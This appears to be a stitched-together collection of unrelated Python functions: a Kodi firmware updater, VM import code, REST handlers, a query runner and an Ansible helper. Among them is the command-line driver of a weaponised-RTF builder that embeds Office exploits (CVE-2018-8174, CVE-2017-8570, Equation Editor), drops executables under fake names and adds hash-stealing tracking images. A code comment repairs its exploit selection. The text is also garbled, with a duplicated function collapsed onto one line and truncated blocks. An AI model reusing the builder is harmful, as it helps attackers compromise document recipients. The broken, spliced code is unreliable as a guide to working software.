        utils.ok("pacemaker resource %s doesn't run on this node "
                 "(but on %s)" % (options.pacemaker_resource,
                                  patterns.group(2)))
def checkForUpdate(silent=1):
    # OTA update entry point. *silent* doubles as a mode flag: '2'/'3'
    # delegate to reboot handling, '4' triggers a manual update, any other
    # value is coerced to a bool that suppresses UI dialogs when True.
    if silent == '2' or silent == '3':
        utils.rebootCommand(silent)
        return
    if silent == '4':
        # Manual update: fetch the firmware list from the vendor server.
        try:
            url = 'http://navixhardware.com/manual.m3.php'
            response = urllib2.urlopen(url).read()
        except:
            # Network failure: silently abort the manual update.
            return []
        performManualUpdate(response, silent)
        return
    utils.saveOta()
    # From here on *silent* is a plain bool.
    silent = int(silent) == 1
    if silent and utils.getSetting('autoUpdate') == 'false':
        return allDone(silent)
    response = getResponse()
    isValid = len(response) > 0
    if not isValid:
        # No/invalid server response: optionally tell the user, then finish.
        if not silent:
            utils.ok(1, 12, 13)
        return allDone(silent)
    if updateAvailable(response['Version']):
        utils.log('Update Available')
        performUpdate(response, silent)
    elif not silent:
        # Up to date: either resume a previous download or say so.
        if downloaded():
            checkPrevious()
        else:
            utils.ok(1, 22, 13)
    allDone(silent)
def initialise(self, force: bool):
    """Create this VM's directory, optionally overwriting an existing one.

    :param force: when True, wipe and recreate an already-existing VM
                  directory instead of aborting.
    Exits with status 1 on any failure.
    """
    utils.pend("initialise VM")
    try:
        os.mkdir(self.path)
        utils.ok()
    except PermissionError as pe:
        utils.fail(pe)
        exit(1)
    except OSError:
        # Most likely EEXIST: the VM directory is already there.
        msg = "%s already exists" % self.name
        if force:
            utils.info("%s, overwriting" % msg)
            try:
                shutil.rmtree(self.path)  # FIXME what if PWD == self.path ?
                os.mkdir(self.path)
            except PermissionError as pe:
                utils.fail(pe)
                exit(1)
            except OSError as ose2:
                # BUG FIX: report the error from the overwrite attempt
                # (ose2); previously the original mkdir error was shown.
                utils.fail(ose2)
                exit(1)
        else:
            utils.info(msg)
            exit(1)
def patch_site_settings_values(**kwargs):
    """Validate and persist a partial update of the site settings.

    :param kwargs: expects 'body' (dict of setting fields) and 'email'
                   (the author recorded by the update query).
    :returns: ok(updated settings) or bad_request(validation errors).
    """
    body = kwargs.get('body')
    email = kwargs.get('email')
    # Collect every supported field; missing keys default to '' and are
    # stripped below so only supplied fields end up in the update.
    settings = {
        'site_visibility': body.get('site_visibility', ''),
        'title': body.get('title', ''),
        'fontsize': body.get('fontsize', ''),
        'coloraccent': body.get('coloraccent', ''),
        'isdarkmode': body.get('isdarkmode', ''),
        'description': body.get('description', ''),
        'copyright': body.get('copyright', ''),
        'websiteurl': body.get('websiteurl', ''),
        'brandmail': body.get('brandmail', ''),
        'brandlogourl': body.get('brandlogourl', ''),
        'faviconurl': body.get('faviconurl', ''),
        'appiconurl': body.get('appiconurl', '')
    }
    schema_validation = Validator(PATCH_ADMIN_SETTINGS_SCHEMA)
    remove_empty_values_of_dict(settings)
    resp = None
    if schema_validation.validate(settings):
        query = dynamic_update_query(
            settings, 'settings.site_settings', '', email)
        print(query)
        msg = {
            'body': {
                'action': 'run',
                'queries': [query]
            }
        }
        method, result = db_handler(msg)
        print(result)
        if method == 'ok':
            resp = settings
        # NOTE(review): when the DB call fails (method != 'ok'), resp stays
        # None and ok(None) is returned below -- confirm this is intended
        # rather than an internal-server-error response.
    else:
        return bad_request(schema_validation.errors)
    return ok(resp)
def POST(self, username, mail, password):
    """Register a new user, mapping validation/insert failures to HTTP errors."""
    candidate = User(username, mail, password)
    # User already exist, so we couldn't add it another time
    if candidate.exist() == OK:
        return httpError(205)
    validation = candidate.validate()
    if validation == INVALID_MAIL:
        return httpError(201)
    if validation == INSECURE_PASSWORD:
        return httpError(202)
    if candidate.insert_db() == UNKNOWN_ERROR:
        return httpError(203)
    return ok()
def execute_queries(queries):
    """
    This function fetches content from MySQL RDS instance
    """
    # NOTE(review): RealDictCursor is psycopg2's cursor factory, so this
    # appears to target PostgreSQL despite the docstring -- confirm.
    conn = dbconnect()
    result = []
    for query in queries:
        # One cursor per query; the context manager closes it afterwards.
        with conn.cursor(cursor_factory=RealDictCursor) as cur:
            try:
                cur.execute(query)
                rows = cur.fetchall()
                result.append(json.dumps(rows, indent=2))
            except Exception as e:
                # Failed queries are logged and skipped; the remaining
                # queries still run.
                print(e)
    conn.close()
    return ok(result)
def _import(self, targz: str, raw: bool, force: bool, **kwargs: dict):
    """Import a VM from a .tar.gz package (or a raw image when *raw*).

    The package is decompressed into the VM directory, then the disk image
    and any "<image>.<snapshot>" members are extracted from the tar.

    :param targz: path to the package (or raw image when *raw* is True).
    :param raw: import a plain raw image instead of a package.
    :param force: overwrite an existing VM directory.
    """
    if raw:
        self.import_raw(targz, force)
        return
    if not os.path.exists(targz):
        utils.fail("%s: file not found" % targz)
        exit(1)
    targz = os.path.abspath(targz)
    # The intermediate (uncompressed) tar lives inside the VM directory.
    tar = '%s/%s' % (self.path, os.path.basename(os.path.splitext(targz)[0]))
    self.initialise(force)
    os.chdir(self.path)  # create intermediate files in VM's path
    utils.pend("decompress package", msg="may take some time")
    utils.execute(['gzip', '-cd', targz], outfile=tar)
    utils.ok()
    utils.pend("scan package")
    _, file_list, _ = utils.execute(['tar', '-tf', tar], iowrap=True)
    utils.ok()
    file_list = file_list.split()
    for f in file_list:
        if f == os.path.basename(self.path_raw):
            utils.pend("extract disk image")
        else:
            # Snapshot members are named "<image>.<snapshot>".
            result = re.search(
                '(?<=%s\.).+' % os.path.basename(self.path_raw), f
            )
            if not result:
                utils.warn("misformatted file: %s (skipping)" % f)
                continue
            snapshotname = result.group(0)
            utils.pend("extract snapshot: %s" % snapshotname)
        utils.execute(['tar', '-x', f, '-f', tar])
        utils.ok()
    utils.pend("clean up")
    os.unlink(tar)
    utils.ok()
def POST(self):
    """Verify that the authenticated user owns the requested door."""
    try:
        payload = cherrypy.request.json
        login = payload['auth']['login']
        password = payload['auth']['password']
        door_id = payload['id']
    except:
        # Malformed/missing JSON payload.
        return httpError(200)
    requester = User(login, password=password)
    if requester.exist() == USER_NOT_EXIST:
        return httpError(204)
    door = Door(door_id)
    if door.exist() == DOOR_NOT_EXIST:
        return httpError(301)
    # User don't have permissions on this door
    if door.userid != requester.userid:
        return httpError(207)
    return ok()
def GET(self, login, password):
    """Authenticate a user: 204-error when unknown, otherwise OK."""
    candidate = User(login, password=password)
    if candidate.exist() == USER_NOT_EXIST:
        return httpError(204)
    return ok()
def performManualUpdate(response, silent): try: import xbmcgui path = getDownloadPath() select_name=['Cancel'] select_url=['Cancel'] for i in json.loads(response): cVersion = utils.getSetting('cVersion') if not cVersion in i['Version']: select_name.append(i['Version']) select_url.append(i['Link']+'*'+i['Version']+'*'+i['MD5']) link = select_url[xbmcgui.Dialog().select('Your Current Firmware '+ cVersion , select_name)] if 'Cancel' in link: return url = link.split('*')[0] version = link.split('*')[1] md5 = link.split('*')[2] if utils.generateMD5(path) != md5: if (not silent) and (not utils.yesno(1, 11, 0)): return dp = None if silent: dp = utils.progress(1, 14, 15) hash = 0 count = 0 nTries = 3 if not silent: nTries = 1 while (count < nTries) and (hash != md5): count += 1 try: download(url,path,version,dp) hash = utils.generateMD5(path) except Exception, e: utils.deleteFile(path) if str(e) == 'Canceled': return if hash != md5: utils.unflagUpdate() utils.deleteFile(path) utils.setSetting('dVersion', '0.0.0') if not silent: utils.ok(1, 24, 13) return utils.setSetting('dVersion', version) if not utils.okReboot(1, 23, 16, 18, delay = 15): return reboot()
def main():
    """CLI entry point: build an RTF containing the selected exploits.

    Reads an RTF template, appends packages / tracking image / exploit
    payloads, and writes the result to --out.  Exits via bye() on any
    invalid argument combination.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-D', '--debug', action='store_true',
                        help='enable debug')
    parser.add_argument('-l', '--list', action='store_true',
                        help='list exploits and additions')
    parser.add_argument('-u', '--use', action='append',
                        help='add exploit (see --list)')
    parser.add_argument('--use-cve', action='append',
                        help='add exploit (by CVE)')
    parser.add_argument('--exe-name',
                        help='name for dropped EXE file (for exploits equation and composite)')
    parser.add_argument('--template', default=utils.basedir(default_rtf),
                        help='RTF template to add exploit to (default: {})'.format(default_rtf))
    parser.add_argument('--fake-path', default=default_fakepath,
                        help='fake path for packaged files (default: {})'.format(default_fakepath))
    parser.add_argument('-o', '--out', help='RTF output')
    king = parser.add_argument_group('king exploit',
                                     'King exploit (CVE-2018-8174) options')
    king.add_argument('--king-shellcode',
                      default=utils.basedir(default_king_shellcode),
                      help='shellcode for CVE-2018-8174 (default: {})'.format(default_king_shellcode))
    king.add_argument('--king-url',
                      help='URL where HTML will be hosted for king exploit (max: 39 chars)')
    king.add_argument('--king-html-out', help='output file for king HTML')
    composite = parser.add_argument_group('composite exploit',
                                          'Composite moniker exploit (CVE-2017-8570) options')
    composite.add_argument('--composite-sct',
                           help='use this SCT file instead of generating one')
    additions = parser.add_argument_group('additions',
                                          'Additional things to add to the RTF')
    additions.add_argument('--image-track',
                           help='include an image from this URL, for tracking and hash stealing')
    additions.add_argument('-p', '--package', action='append',
                           help='files to add as packages. will by dropped in temp (append fake name with colon)')
    args = parser.parse_args()

    # -D/--debug
    utils.enable_debug = args.debug

    # -l/--list
    if args.list:
        print('exploits (use with --use):')
        for exploit, cve in exploit_to_cve.items():
            print(' - {} ({})'.format(exploit, cve))
        print()
        print('additions:')
        print(' - image tracking and hash stealing (use with --image-track)')
        print(' - embed file as package to be dropped in %temp% (use with --package)')
        sys.exit()

    # read original rtf
    with open(args.template, 'r') as fp:
        rtf = fp.read()

    # remove last } so payloads can be appended inside the document group
    rtf = rtf.rstrip()
    if rtf[-1] != '}':
        bye('} must be the last character of the rtf')
    rtf = rtf[:-1]
    rtf += '\n' * 3

    # use these exploits
    used = []
    if args.use:
        # -u/--use
        for item in args.use:
            for exploit in item.split(','):
                exploit = exploit.lower()
                if exploit == 'all':
                    # use all exploits
                    used += supported_exploits
                else:
                    # check to make sure it exists
                    if exploit not in supported_exploits:
                        bye('unknown exploit: {}'.format(exploit))
                    used.append(exploit)
    else:
        # defaults
        used = default_exploits

    # --use-cve
    if args.use_cve:
        for item in args.use_cve:
            for cve in item.split(','):
                cve = cve.lower()
                # check to make sure it exists
                if cve not in cve_to_exploit:
                    bye('unknown CVE: {}'.format(cve))
                used.append(cve_to_exploit[cve])

    # dedupe and sort the exploits by reliability
    used = list(set(used))
    used = sorted(used, key=lambda x: supported_exploits.index(x))

    # embed packages
    packages = None
    if args.package:
        packages = parse_packages(args.package)
        for package, fakename in packages:
            package = rtf_package.Package(package, fakename=fakename,
                                          fakepath=args.fake_path)
            rtf += package.build_package()

    # track with image (--image-track)
    if args.image_track:
        yes('adding image track: {}'.format(args.image_track))
        rtf += generate_image(args.image_track)

    # generate exploits
    for exploit in used:
        yes('adding exploit {} ({})'.format(exploit, exploit_to_cve[exploit]))
        if exploit == 'king':
            # check args
            if not args.king_url:
                bye('specify --king-url')
            if not args.king_html_out:
                bye('specify --king-html-out')
            # if using the default shellcode, make sure it'll work
            if args.king_shellcode == utils.basedir(default_king_shellcode):
                if (args.exe_name and args.exe_name != default_king_exe_name) or \
                        not check_packages(packages, default_king_exe_name):
                    bye('the default king shellcode expects an executable named {} to be packaged'.format(default_king_exe_name))
            # make rtf part
            rtf_part = exploits.king.generate_rtf(args.king_url)
            if not rtf_part:
                bye('king url too long: {}'.format(args.king_url))
            rtf += rtf_part
            # read shellcode
            with open(args.king_shellcode, 'rb') as fp:
                shellcode = fp.read()
            # make html part
            html = exploits.king.generate_html(shellcode)
            # output html
            ok('writing king html to {}'.format(args.king_html_out))
            ok('rtf will retrive king exploit from {}'.format(args.king_url))
            with open(args.king_html_out, 'w+') as fp:
                fp.write(html)
        elif exploit in ['equation1', 'equation2']:
            if not check_packages(packages, args.exe_name):
                bye('provide a file to execute with -p/--package (or change file with --exe-name)'.format(args.exe_name))
            # exe name is --exe-name or the package if there's only one
            exe_name = args.exe_name if args.exe_name else packages[0][1]
            # Bug fix: both branches previously tested 'equation2', so
            # equation1 never emitted its payload and equation2 got rtf1.
            if exploit == 'equation1':
                rtf += exploits.equation.generate_rtf1(exe_name)
            elif exploit == 'equation2':
                rtf += exploits.equation.generate_rtf2(exe_name)
        elif exploit == 'composite':
            if not check_packages(packages, args.exe_name):
                bye('provide a file to execute with -p/--package (or change file with --exe-name)'.format(args.exe_name))
            # exe name is --exe-name or the package if there's only one
            exe_name = args.exe_name if args.exe_name else packages[0][1]
            # add SCT if needed
            with tempfile.NamedTemporaryFile() as temp:
                sct_name = utils.randstr(15, 15) + '.sct'
                if args.composite_sct:
                    # use user SCT
                    package = rtf_package.Package(args.composite_sct,
                                                  fakename=sct_name,
                                                  fakepath=args.fake_path)
                    rtf += package.build_package()
                else:
                    # build an SCT
                    sct = exploits.composite.generate_sct(exe_name)
                    temp.write(sct.encode())
                    temp.flush()
                    package = rtf_package.Package(temp.name,
                                                  fakename=sct_name,
                                                  fakepath=args.fake_path)
                    rtf += package.build_package()
                rtf += exploits.composite.generate_rtf(sct_name)
        else:
            raise RuntimeError('unknown exploit')

    # add back an enclosing }
    rtf += '}\n'

    # write new rtf
    if args.out:
        ok('writing rtf to {}'.format(args.out))
        with open(args.out, 'w+') as fp:
            fp.write(rtf)
    else:
        bye('specify output RTF file with --out')
def performManualUpdate(response, silent):
    """Present a firmware picker and download / stage the chosen image.

    :param response: JSON string listing available firmware builds; each
                     entry carries 'Version', 'Link' and 'MD5' fields
    :param silent: when True, skip confirmation dialogs and retry the
                   download up to three times
    """
    # NOTE(review): this `try:` has no visible except/finally clause in the
    # source as provided — it appears truncated; confirm against the
    # original file.
    try:
        import xbmcgui  # lazy import: only available inside Kodi/XBMC
        path = getDownloadPath()
        # Parallel lists: display labels and "url*version*md5" blobs.
        select_name = ['Cancel']
        select_url = ['Cancel']
        for i in json.loads(response):
            cVersion = utils.getSetting('cVersion')
            # Skip the build that is already installed.
            if not cVersion in i['Version']:
                select_name.append(i['Version'])
                select_url.append(i['Link'] + '*' + i['Version'] + '*' + i['MD5'])
        link = select_url[xbmcgui.Dialog().select(
            'Your Current Firmware ' + cVersion, select_name)]
        if 'Cancel' in link:
            return
        url = link.split('*')[0]
        version = link.split('*')[1]
        md5 = link.split('*')[2]
        # Only download when we don't already hold a file with the right MD5.
        if utils.generateMD5(path) != md5:
            if (not silent) and (not utils.yesno(1, 11, 0)):
                return
            dp = None
            if silent:
                dp = utils.progress(1, 14, 15)
            hash = 0  # NOTE: shadows the `hash` builtin
            count = 0
            nTries = 3
            if not silent:
                nTries = 1
            # Retry until the checksum matches or the tries run out.
            while (count < nTries) and (hash != md5):
                count += 1
                try:
                    download(url, path, version, dp)
                    hash = utils.generateMD5(path)
                except Exception, e:  # Python 2 syntax
                    utils.deleteFile(path)
                    if str(e) == 'Canceled':
                        return
            if hash != md5:
                # Download failed: clear all pending-update state.
                utils.unflagUpdate()
                utils.deleteFile(path)
                utils.setSetting('dVersion', '0.0.0')
                if not silent:
                    utils.ok(1, 24, 13)
                return
        utils.setSetting('dVersion', version)
        if not utils.okReboot(1, 23, 16, 18, delay=15):
            return
        reboot()
def run_playbook(inventory_path, playbook_path, key_path, tags, ansibleopts):
    """Run an Ansible playbook if its file exists.

    Logs and delegates to __run_playbook(), returning its result; when
    the playbook file is missing, reports an error and returns None.
    """
    # Guard clause: bail out early when the playbook file is absent.
    if not os.path.exists(playbook_path):
        utils.error('Playbook not found', os.path.basename(playbook_path))
        return
    utils.ok('Running playbook', playbook_path)
    return __run_playbook(inventory_path, playbook_path, key_path, tags,
                          ansibleopts)